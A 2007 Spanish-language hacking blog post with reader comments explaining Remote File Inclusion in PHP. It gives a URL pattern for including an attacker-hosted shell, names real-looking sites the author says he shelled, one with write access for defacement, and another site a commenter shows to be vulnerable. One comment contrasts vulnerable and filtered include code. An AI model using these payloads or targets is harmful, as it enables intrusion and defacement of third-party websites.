RFI o Remote File Inclusion
17 Aug
Publicado por por JDF en Información, Programación, Seguridad, Web
RFI (Remote File Inclusion) en español (Inclusion de Archivo remoto), es la tecnica que se aprovecha de una falla en la programacion de paginas web, mediante la cual podemos insertar archivos ingresando algunos parametros por la url, este fallo se logra cuando por algun motivo el webmaster o programador no cierra bien su pagina y sin darse cuenta el hecho que su URL llame a algun archivo y parametro con un simple php?=, php?c=, php?id=…………….etc, si se fijan con el Signo = se esta haciendo referencia a una web o algun archivo, es hay donde nos aprovechamos e insertamos nuestro archivo o sh3ll, si la pagina tiene fallos de RFI entraremos pero no al server ni al index directamente solo podremos ejecutar el archivo que direccionamos si hemos direccionado una SH3LL debemos cerrar la sentencia con un signo ? para que se ejecute en el server y no en nuestro pc,
un ejemplo
http:://web-victima.com/php?id=/mi-web-con-mi-shell?
Pero tampoco es cosa de subir una shell y soltarse a defacear o hacer cosas hay paginas que ya estan protegidas y te hacen un poco mas dicficil el ingreso miren les pongo un ejemplo
esta pagina
http://www2.koillismaa.fi/~juhan/preview.php?file= tiene fallo RFi y le inserte mi shell, pero si se fijan en la parte donde dice Safe mode On es decir con seguridad activa, (No inviolable pero si con seguridad activa)
Ahora si tenemos un poco de suerte nos podemos encontrar con algo asi
http://www.wpfutsal.com/index.php?page= Tiene falo RFi y le inserte mi shell ahora si se fijan donde dice SAFE MODE OFF es decir con la guardia baja y tengo permisos de escritura en muchos de los archivos, con esto puedo hacer un deface modificando el Index
Bueno pongo solo eso por ahora, espero que le aclare un poquito sobre el tema, recuerden que si quieren saber mas solo pregunten y posteamos mas cosas
7 Respuestas
vlascon
18th August 2007 a las 12:54 pm
1:d Te pasaste wn!, faltaba eso viste :d espero que ahora si quede mas claro…. JAJAJA
Saludos
CPS 2.0
19th August 2007 a las 5:00 pm
2Estos son ejemplos de programación PHP vulnerable a RFI y protegida:
El ejemplo no funciona bajo apache protegido por mod_security
// Para que funcione correctamente la shell se debe poner al final de esta el signo ?, asà las variables que se incluyan posteriormente serán parte de ella y no del PHP de la victima
// URL ejemplo: http://web-victima.com/php?page=http://mi-web.cl/mi_shell.php?
// Código PHP vulnerable
< ?PHP
include($_GET['page']); //esto incluye directamente y sin filtros cualquier link que se especifique en “pageâ€
?>
// Código PHP protegido
< ?PHP
$url='./'.$_GET['page']; // o en nibel superior: $url='./paginas/'.$_GET['page'];
include($url); //esto obliga a que "page" sea parte del dominio, de no encontrar el archivo devolverá un Warning como este:
//Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/newbie/www/rfi.php on line 3
// El problema cuando se ve este mensaje, es que indicas al atacante que la inclusión es a la página que le pones en la URL, además se ve una especie de error y no queremos que pase eso.
?>
// Código PHP protegido sin mensajes
< ?PHP
$url='./'.$_GET['page']; // o en nibel superior: $url='./paginas/'.$_GET['page'];
If(¡file($url)){
$url='./pagina_por_defecto.php';
}
include($url); //no devolverá ningún warning y mostrara la información por defecto de nuestra página
?>
Para mas información acerca de las funciones PHP, http://www.php.net
MSWINSCK
20th August 2007 a las 11:30 pm
3UTA LAS WEA MAS WEAS TONTAS JEJEJJEAJEAJ
SE HACEN LLAMAR HACKERS???????????????????????
PAGINA DE PRINCIPIANES.
vlascon
21st August 2007 a las 4:12 pm
4MSWINSCK, como te conteste en el post anterior http://www.newbie.cl/nb/2007/08/18/tecnicas-de-sql-injection/#comment-185 Nadie dice que somos Hacker….
De nuevo Gracias por visitarnos.
CPS 2.0
21st August 2007 a las 4:19 pm
5Estimado MSWINSCK:
Nuestra pagina web se llama Newbie.cl y no Hacker.cl
Para mas informacion acerca de estas definiciones puedes visitar http://www.newbie.cl/nb/2007/06/21/hacker-white-hat-entre-otros/
Salu2
GR
6th December 2007 a las 12:36 pm
6Amigo,
Una de las formas de probar RFI es intentando colocar http://web-victima.com/php?page=http://www.google.com y si aparece la página de Google dentro del site te indica que es vulnerable. Lo mismo aplica para cuando tenemos casos como http://web-victima.com/id=http://www.google.com?... ¿Cómo evalúo un site a ver si es vulnerable?, puedes poner ejemplos posibles
vlascon
28th December 2007 a las 1:52 pm
7mmm… ejemplo real… ufff… complicado
…
La verdad no se si corresponda pero bueno… el otro dia googleando… encontre este sitio
http://www.smartel.cl/home.php?nombre_pagina=enlaces.html
y me llamo la atencion que estaba llamando un archivo .html lo cual lo primero que hice fue probar una ruta externa:
http://www.smartel.cl/home.php?nombre_pagina=http://www.newbie.cl/index.html
Sorpresa
Funiona!… bueno eso…
54lud05
RSS sindicación para comentarios en esta entrada · TrackBack URI
Dejar una respuesta
Categorías
Archivos
Calendario
Enlaces
Meta
Entradas Recientes
Comentarios Recientes
Las más comentadas
Upload.cl esta creado con WordPress - BloggingPro tema por: Design Disease. Traducido por Temas Wordpress, Viajes y Autos